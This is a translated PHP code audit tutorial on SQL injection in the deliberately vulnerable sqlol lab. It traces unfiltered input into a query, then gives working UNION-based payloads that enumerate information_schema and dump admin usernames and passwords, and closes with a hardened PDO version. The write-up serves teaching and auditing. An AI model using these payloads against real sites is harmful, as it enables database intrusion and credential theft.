"PHP Code Audit Example Tutorial" SQL injection –1. Nothing is filtered. Getting Started

Source: Internet
Author: User
This blog will be updated with several PHP code audit tutorials in the coming days. The articles are reproduced from a friend's blog; their style is concise and clear, which is the style I have always tried to keep on my own blog as well.

The articles are reposted with permission (authorized by Cnbraid). Although they are not my original work, the content is very solid, and I hope readers like it.

0x01 Background

First of all, congratulations to Seay on his masterpiece "Code Audit: Enterprise-class Web Code Security Architecture"; after two days of reading it I felt I had gained a great deal. Since I have also been doing audits for two years, I decided to write a "PHP Code Audit Example Tutorial" series, hoping to help newcomers understand this area better, and also as a way of consolidating my own knowledge. Experts, please take a detour ~

0x02 Environment Setup

There are a great many integrated PHP+MySQL environments, such as phpStudy, WAMP and LAMP; installation is just a matter of clicking through the installer, and there are plenty of guides online, so I will not repeat them here.

The environment used here is sqlol, a configurable SQL injection test platform. It contains a simple SQL injection test environment covering the four basic kinds of SQL statement: insert (INSERT), delete (DELETE), update (UPDATE) and query (SELECT).

PS: Code with no filtering at all is rare nowadays; any programmer who has had the slightest contact with security knows to write code on top of a ready-made framework, which already does some filtering. So this platform is mainly used to practise how to perform SQL injection in various situations and how to write a PoC.

① I packed a copy of the source: http://pan.baidu.com/s/1nu2vaOT

② Extract it into the sql directory under WWW; opening http://localhost/sql directly shows the following interface:

0x03 Vulnerability Analysis

First look at the source structure. It is fairly simple: apart from the top-level pages there is only one includes folder, containing the database configuration and a few shared files:

Here is a brief source analysis; if you do not follow it, skip ahead and look at the later sections ~

1. Look at the select.php file: it starts by including /includes/nav.inc.php

 
  

2. Follow nav.inc.php and you find that this file is the core form page for select, and also the input handler:

The form input handler is relatively simple; it mainly applies the corresponding filtering and processing according to the options chosen on the form, as follows:

 

3. Back in select.php, there is a handler for the submitted form that decides where to inject and constructs the SQL statement. Follow it:

<?php
// select.php, the form handler. The copy on the page starts part-way through the first
// branch (the condition is reconstructed from sqlol's "entire_query" location) and sits
// inside an outer block whose opening is cut off; everything else is the page's own logic.
if ($_REQUEST['location'] == 'entire_query') {
    // the whole query comes from the form
    $query        = $_REQUEST['inject_string'];
    $displayquery = '<u>' . $_REQUEST['inject_string'] . '</u>';
} else {
    // Here the SQL statement is constructed according to the location you chose to inject.
    // The $display_* copies are identical except that the injected part is wrapped in <u> tags.
    $display_column_name     = $column_name     = 'username';
    $display_table_name      = $table_name      = 'users';
    $display_where_clause    = $where_clause    = 'WHERE isadmin = 0';
    $display_group_by_clause = $group_by_clause = 'GROUP BY username';
    $display_order_by_clause = $order_by_clause = 'ORDER BY username ASC';
    $display_having_clause   = $having_clause   = 'HAVING 1 = 1';

    switch ($_REQUEST['location']) {
        case 'column_name':
            $column_name         = $_REQUEST['inject_string'];
            $display_column_name = '<u>' . $_REQUEST['inject_string'] . '</u>';
            break;
        case 'table_name':
            $table_name         = $_REQUEST['inject_string'];
            $display_table_name = '<u>' . $_REQUEST['inject_string'] . '</u>';
            break;
        case 'where_string':
            // string context: the value sits between single quotes, and nothing is escaped
            $where_clause         = "WHERE username = '" . $_REQUEST['inject_string'] . "'";
            $display_where_clause = "WHERE username = '<u>" . $_REQUEST['inject_string'] . "</u>'";
            break;
        case 'where_int':
            // integer context: no quotes at all, so no quote is needed to break out
            $where_clause         = 'WHERE isadmin = ' . $_REQUEST['inject_string'];
            $display_where_clause = 'WHERE isadmin = <u>' . $_REQUEST['inject_string'] . '</u>';
            break;
        case 'group_by':
            $group_by_clause         = 'GROUP BY ' . $_REQUEST['inject_string'];
            $display_group_by_clause = 'GROUP BY <u>' . $_REQUEST['inject_string'] . '</u>';
            break;
        case 'order_by':
            $order_by_clause         = 'ORDER BY ' . $_REQUEST['inject_string'] . ' ASC';
            $display_order_by_clause = 'ORDER BY <u>' . $_REQUEST['inject_string'] . '</u> ASC';
            break;
        case 'having':
            $having_clause         = 'HAVING isadmin = ' . $_REQUEST['inject_string'];
            $display_having_clause = 'HAVING isadmin = <u>' . $_REQUEST['inject_string'] . '</u>';
            break;
    }

    // Note: $having_clause is built above but is not part of the query in this version.
    $query = "SELECT $column_name FROM $table_name $where_clause $group_by_clause $order_by_clause";
    /* Probably a better way to create $displayquery... This allows me to underline the
       injection string in the resulting query that is displayed with the "Show query"
       option, without munging the query which hits the database. */
    $displayquery = "SELECT $display_column_name FROM $display_table_name $display_where_clause $display_group_by_clause $display_order_by_clause";
}
include('includes/database.inc.php');   // a file is included here; we follow it next
?>

4. Follow database.inc.php: here the query is finally passed to the database. So the form is fully understood: along the whole path, from the form to the database, nothing is filtered ^_^

<?php
// includes/database.inc.php (relevant part). ADOdb is used for the connection; the
// query built in select.php is passed straight to Execute() with no filtering and no
// parameter binding. $DSN is assumed to come from the database configuration file.
require_once('adodb/adodb.inc.php');   // ADOdb library, provides NewADOConnection()
$db_conn = NewADOConnection($DSN);
// Echo the "display" copy of the query. The HTML around the label was stripped from the
// page; only the tail of the label, "... underlined):", survives.
print("\n" . "... underlined): " . $displayquery . "\n");
$db_conn->SetFetchMode(ADODB_FETCH_ASSOC);
$results = $db_conn->Execute($query);   // the sink: user-controlled $query executed as-is
?>

0x04 Proof of the Vulnerability

1. Now that we have the injection point, start by entering 1, choose the integer in the WHERE clause (where_int) as the injection position, and switch on Seay's MySQL log monitor:

2. The SQL query captured in the log is: SELECT username from users WHERE isadmin = 1 GROUP by username ORDER by username ASC

From the SQL statement captured in the MySQL log monitor we can see that the SELECT returns a single column, so a UNION SELECT must also supply exactly one column. The -1 makes the original WHERE match no rows, so only the UNION row is displayed, and the trailing # comments out the GROUP BY and ORDER BY that the page appends. We then construct the PoC:

-1 UNION SELECT 222333#

Locate the position of the output point "222333", as shown:

3. Construct a PoC that retrieves information about the database (0x5c is a backslash, used as a separator between the three values):

-1 UNION SELECT CONCAT(database(), 0x5c, user(), 0x5c, version())#

This successfully retrieves the database name (sqlol), the account (root@localhost) and the database version (5.6.12), as shown:

4. Construct a PoC that lists all tables in the sqlol database (0x73716c6f6c is the string 'sqlol' written as a hex literal, which avoids having to use quotes):

-1 UNION SELECT GROUP_CONCAT(DISTINCT table_name) FROM information_schema.tables WHERE table_schema=0x73716c6f6c#

All tables of the sqlol database are successfully retrieved, as shown:

5. Construct a PoC that lists all columns of the admin table (0x61646d696e is 'admin' as a hex literal):

-1 UNION SELECT GROUP_CONCAT(DISTINCT column_name) FROM information_schema.columns WHERE table_name=0x61646d696e#

All columns of the admin table are successfully retrieved, as shown:

6. Construct a PoC that dumps the account and password from the admin table (0x5f is an underscore, used as the separator):

-1 UNION SELECT GROUP_CONCAT(DISTINCT username, 0x5f, password) FROM admin#

The administrator's account and password are successfully retrieved, as shown:
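To make the path from each PoC to the statement that actually reaches MySQL concrete, and to show what the same handler looks like once values are bound and identifiers allow-listed, here is an added example written for this article (it is my code, not sqlol's). build_query_vulnerable() repeats the concatenation from select.php for three of its locations and prints the resulting SQL, so the effect of the -1, the single UNION column and the trailing # can be read off directly; build_query_safe() is a hardened equivalent that uses PDO bound parameters for the value positions and an allow-list for the identifier position. It assumes PHP 7.1 or later with the pdo_sqlite extension and a users table with username and isadmin columns (constructed in memory, standing in for sqlol's MySQL tables); the information_schema payload is MySQL-specific, so it is only composed, not executed.

```php
<?php
// Added example for this article; not sqlol's code. Needs PHP 7.1+ with pdo_sqlite.
// Assumptions: a users table with columns username (TEXT) and isadmin (INTEGER), and the
// where_int / where_string / order_by locations from select.php. The information_schema
// payload from section 0x04 is MySQL-only, so it is composed here but not executed.

// MySQL hex literal for a string, e.g. 'sqlol' -> 0x73716c6f6c: a string constant without quotes.
function hex_literal(string $s): string
{
    return '0x' . bin2hex($s);
}

// The concatenation from select.php, reduced to three locations, so that the SQL which
// actually reaches the server for each PoC can be printed.
function build_query_vulnerable(string $location, string $inject): string
{
    $where_clause = 'WHERE isadmin = 0';
    $order_by     = 'ORDER BY username ASC';
    switch ($location) {
        case 'where_int':
            $where_clause = 'WHERE isadmin = ' . $inject;          // integer context: no quotes at all
            break;
        case 'where_string':
            $where_clause = "WHERE username = '" . $inject . "'";  // string context: quotes not escaped
            break;
        case 'order_by':
            $order_by = 'ORDER BY ' . $inject . ' ASC';            // identifier context
            break;
    }
    return "SELECT username FROM users $where_clause GROUP BY username $order_by";
}

// Hardened equivalent. Values become bound parameters; identifiers, which cannot be bound,
// are checked against an allow-list; an unknown location (including "entire_query") is an error.
// Returns [$sql, $params] ready for PDO::prepare() / PDOStatement::execute().
function build_query_safe(string $location, string $inject): array
{
    $sortable = ['username', 'isadmin'];
    switch ($location) {
        case 'where_int':
            if (filter_var($inject, FILTER_VALIDATE_INT) === false) {
                throw new InvalidArgumentException('isadmin must be an integer');
            }
            return ['SELECT username FROM users WHERE isadmin = ? GROUP BY username ORDER BY username ASC',
                    [(int) $inject]];
        case 'where_string':
            return ['SELECT username FROM users WHERE username = ? GROUP BY username ORDER BY username ASC',
                    [$inject]];
        case 'order_by':
            if (!in_array($inject, $sortable, true)) {
                throw new InvalidArgumentException('sort column not in allow-list');
            }
            return ["SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY $inject ASC", []];
        default:
            throw new InvalidArgumentException('unknown location');
    }
}

// Constructed sample data standing in for sqlol's MySQL tables.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT, isadmin INTEGER)');
$db->exec("INSERT INTO users VALUES ('alice', 1), ('bob', 0)");

$pocs = [
    ['where_int',    '1'],
    ['where_int',    '-1 UNION SELECT 222333#'],
    ['where_int',    '-1 UNION SELECT GROUP_CONCAT(DISTINCT table_name) FROM information_schema.tables'
                     . ' WHERE table_schema=' . hex_literal('sqlol') . '#'],
    ['where_string', 'alice'],
    ['order_by',     'isadmin'],
];

foreach ($pocs as [$location, $inject]) {
    echo "[$location] $inject\n";
    // The '#' comments out the trailing GROUP BY / ORDER BY; the single column keeps the UNION valid.
    echo '  vulnerable: ' . build_query_vulnerable($location, $inject) . "\n";
    try {
        [$sql, $params] = build_query_safe($location, $inject);
        $stmt = $db->prepare($sql);
        $stmt->execute($params);
        echo '  hardened:   ' . json_encode($stmt->fetchAll(PDO::FETCH_COLUMN)) . "\n";
    } catch (InvalidArgumentException $e) {
        echo '  hardened:   rejected (' . $e->getMessage() . ")\n";
    }
}
```

Run it from the command line with php. Two points for the auditor: in the where_int position the attacker never needs a quote, so escaping functions such as addslashes() would not have helped; and the identifier positions (column_name, table_name, group_by, order_by) cannot be protected by parameter binding at all, which is why they need an allow-list rather than escaping.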

Original address:

http://www.cnbraid.com/2015/12/17/sql0/
